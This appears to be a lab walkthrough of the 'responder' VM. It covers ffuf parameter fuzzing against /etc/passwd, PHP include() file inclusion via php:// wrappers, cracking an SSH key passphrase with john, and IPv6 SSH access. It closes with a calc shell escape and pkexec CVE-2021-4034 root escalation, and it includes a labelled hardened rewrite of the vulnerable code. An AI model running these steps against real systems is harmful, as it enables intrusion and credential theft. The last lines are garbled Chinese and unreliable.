Target VM Pentest Diary: responder
IP
Ports
Port 80 serves only a single sentence, so run a directory scan.
Visiting /filemanager.php redirects to index.php, probably because no parameter was supplied; next, brute-force the parameter name.
ffuf -u 'http://192.168.0.132/filemanager.php?FUZZ=/etc/passwd' -w /root/Filenames_or_Directories_All.txt -fs 0
This yields the parameter random; test it by capturing the request in Burp Suite.
Use the php:// stream wrapper (pseudo-protocol) to read the source of filemanager.php:
<?php
$filename = $_GET['random'];
include($filename);
header('Location:/');
/*
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
...
-----END RSA PRIVATE KEY-----
*/
?>
This yields an SSH private key (passphrase-protected), but the port scan showed port 22 as filtered.
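The root cause is the unchecked include($_GET['random']) above, which accepts stream wrappers and arbitrary paths. As an added illustration (not code from the box or the original post), here is a hardened rewrite that keeps the random parameter but only serves plain files from an assumed directory, /var/www/html/files, and never include()s user-chosen input:

```php
<?php
// Added example, not the box's own code. Hypothetical hardened replacement for
// the filemanager.php shown above, which did include($_GET['random']) unchecked.
// Assumption: files that may be served live under /var/www/html/files.

declare(strict_types=1);

const FILE_ROOT = '/var/www/html/files';

/**
 * Map a user-supplied name to a file inside FILE_ROOT, or return null.
 * Rejects stream wrappers (php://, file://, ...), traversal and anything
 * that does not resolve inside the allowed directory.
 */
function resolveManagedFile(string $name): ?string
{
    // Only a plain filename is accepted: no slashes, no wrapper scheme, no NUL.
    if ($name === '' || !preg_match('/\A[A-Za-z0-9._-]{1,64}\z/', $name)) {
        return null;
    }
    // "." and ".." pass the regex but are directory references, not files.
    if ($name === '.' || $name === '..') {
        return null;
    }
    $real = realpath(FILE_ROOT . '/' . $name);
    if ($real === false || !is_file($real)) {
        return null;
    }
    // realpath() collapses symlinks; the result must still sit under FILE_ROOT.
    $root = realpath(FILE_ROOT);
    if ($root === false || strncmp($real, $root . '/', strlen($root) + 1) !== 0) {
        return null;
    }
    return $real;
}

$name = $_GET['random'] ?? '';
$path = resolveManagedFile((string) $name);
if ($path === null) {
    http_response_code(404);
    exit;
}
// Serve as an opaque download rather than include()-ing it as PHP.
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="' . basename($path) . '"');
readfile($path);
```

With this in place, requests such as random=php://filter/... or random=/proc/net/if_inet6 fail the filename check and get a 404, so the source-disclosure and file-read steps of this walkthrough no longer work.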
Crack the SSH private key passphrase (hash.txt holds the key converted to john's hash format):
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Connect to SSH over the host's IPv6 address instead.
curl 'http://192.168.0.132/filemanager.php?random=/proc/net/if_inet6'
fe80000000000000020c29fffefeab39 02 40 20 80 ens33
00000000000000000000000000000001 01 80 10 80 lo
fd154ba55a2b1008020c29fffefeab39 02 40 00 00 ens33
Scan the IPv6 address with nmap:
nmap -6 -p22 fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39
Connect:
ssh elliot@fd15:4ba5:5a2b:1008:020c:29ff:fefe:ab39 -i id_rsa -6
Run sudo -l.
發(fā)現(xiàn)可以以 rohit 用戶運(yùn)行 calc ,執(zhí)行 !/bin/bash 獲得 shell
查看 SUID 文件,發(fā)現(xiàn)可以運(yùn)行 pkexec ,使用 CVE-2021-4034 進(jìn)行提權(quán)
總結(jié)